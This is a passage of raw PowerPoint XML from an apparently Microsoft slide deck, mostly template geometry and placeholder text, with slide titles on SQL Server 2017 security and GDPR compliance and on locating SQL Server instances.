                    <a:pt x="70" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="41"/>
                    <a:pt x="71" y="42"/>
                    <a:pt x="71" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="44"/>
                    <a:pt x="72" y="45"/>
                    <a:pt x="73" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="41"/>
                    <a:pt x="100" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="43"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="101" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="100" y="40"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="38"/>
                    <a:pt x="98" y="38"/>
                    <a:pt x="97"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446"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5762" y="1153"/>
              <a:ext cx="3" cy="4"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 2"/>
                <a:gd name="T1" fmla="*/ 1 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 2"/>
                <a:gd name="T3" fmla="*/ 2 h 3"/>
                <a:gd name="T4" fmla="*/ 0 w 2"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 0 w 2"/>
                <a:gd name="T7" fmla="*/ 1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1"/>
                    <a:pt x="2" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2"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Freeform 447"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5774" y="1153"/>
              <a:ext cx="5" cy="2"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 2"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 1 h 2"/>
                <a:gd name="T4" fmla="*/ 4 w 4"/>
                <a:gd name="T5" fmla="*/ 2 h 2"/>
                <a:gd name="T6" fmla="*/ 2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2" y="0"/>
                    <a:pt x="2" y="1"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="4" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="2"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="2" y="2"/>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5" name="Freeform: Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="6762953" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7294818"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 7294818 w 7294818"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 729481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4818" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7294818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978914" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683257" y="1562893"/>
            <a:ext cx="5258796" cy="3732214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="274320" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Freeform: Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334508" y="0"/>
            <a:ext cx="1522984" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1319784 w 1522984"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1522984 w 1522984"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 203200 w 1522984"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1522984"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1319784 w 152298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984" h="6858000">
                <a:moveTo>
                  <a:pt x="1319784" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1522984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319784" y="0"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3637296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Agenda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3949" y="289512"/>
            <a:ext cx="11660369" cy="1054884"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="146304" tIns="91440" rIns="146304" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1200" y="6644680"/>
              <a:ext cx="4147213" cy="360970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4146013" y="6644680"/>
              <a:ext cx="8289581" cy="360970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="457135" tIns="137141" rIns="365707" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914144" fontAlgn="auto">
                <a:lnSpc>
                  <a:spcPts val="3000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71055483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92192" name="think-cell Slide" r:id="rId4" imgW="377" imgH="377" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId4" imgW="377" imgH="377" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="3" name="Object 2" hidden="1"/>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6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269241" y="1297501"/>
            <a:ext cx="11653523" cy="1988942"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1961"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="224011" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="448021" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="67203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9388711" y="6536998"/>
            <a:ext cx="2742188" cy="191648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1174">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{181750B2-C378-4896-80E6-341FDC8E0FED}" type="slidenum">
              <a:rPr lang="en-IN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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43800387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2_Title only_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="865" y="0"/>
            <a:ext cx="12191945" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-811" y="1"/>
            <a:ext cx="12192811" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha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ker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a:xfrm>
            <a:off x="1"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rgbClr val="002050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>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187888749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666389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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332474828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Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412803182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Commercial Sales Solution Tours">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
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA9E55C-7145-44AA-A194-18A56141D1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440637" y="683776"/>
            <a:ext cx="4783277" cy="1421928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" spc="-98">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partner Practice Enablement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" spc="-98">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F557F69-8913-447D-9AE6-ED17933C30E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259750" y="2587752"/>
            <a:ext cx="5932250" cy="3439777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2045341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503886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443114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602511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531957"/>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265"/>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023761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389301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image" Target="../media/image9.emf"/><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image" Target="../media/image9.emf"/><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theme" Target="../theme/theme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image" Target="../media/image10.png"/><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image" Target="../media/image9.emf"/><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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout161.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976670"/>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64" r:id="rId3"/>
    <p:sldLayoutId id="2147483730" r:id="rId4"/>
    <p:sldLayoutId id="2147483731" r:id="rId5"/>
    <p:sldLayoutId id="2147483665" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
    <p:sldLayoutId id="2147483667" r:id="rId8"/>
    <p:sldLayoutId id="2147483668" r:id="rId9"/>
    <p:sldLayoutId id="2147483669" r:id="rId10"/>
    <p:sldLayoutId id="2147483670" r:id="rId11"/>
    <p:sldLayoutId id="2147483671" r:id="rId12"/>
    <p:sldLayoutId id="2147483732" r:id="rId13"/>
    <p:sldLayoutId id="2147483734" r:id="rId14"/>
    <p:sldLayoutId id="2147483733" r:id="rId15"/>
    <p:sldLayoutId id="2147483735"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2" r:id="rId25"/>
    <p:sldLayoutId id="2147483683" r:id="rId26"/>
    <p:sldLayoutId id="2147483687" r:id="rId27"/>
    <p:sldLayoutId id="2147483693" r:id="rId28"/>
    <p:sldLayoutId id="2147483694" r:id="rId29"/>
    <p:sldLayoutId id="2147483695" r:id="rId30"/>
    <p:sldLayoutId id="2147483699" r:id="rId31"/>
    <p:sldLayoutId id="2147483736" r:id="rId32"/>
    <p:sldLayoutId id="2147483793" r:id="rId33"/>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217125"/>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3304137477"/>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3920986338"/>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1" r:id="rId23"/>
    <p:sldLayoutId id="2147483792" r:id="rId24"/>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3"/>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3837054214"/>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3"/>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2951387432"/>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09618359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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4267" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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itchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1867" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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itchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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itchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1467" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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itchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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itchFamily="34" charset="0"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent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pewinternet.org/2017/01/26/americans-and-cybersecurity/"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www.pewresearch.org/fact-tank/2016/09/21/the-state-of-privacy-in-america/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bloomberg.com/news/articles/2017-01-19/data-breaches-hit-record-in-2016-as-dnc-wendy-s-co-hacked" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://breachlevelindex.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237F0-7F13-4EE0-AECD-6353F4D536B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269239" y="2084172"/>
            <a:ext cx="11653523" cy="3117200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>SQL Server 2017 Security and GDPR Compliance</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fi-FI" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5088040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79F4-5EE2-664A-9AA2-DF516DCFFCE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Locating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA9C806-7483-7240-AA20-00D39357C4C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>instances</a:t>
            </a:r>
            <a:r>
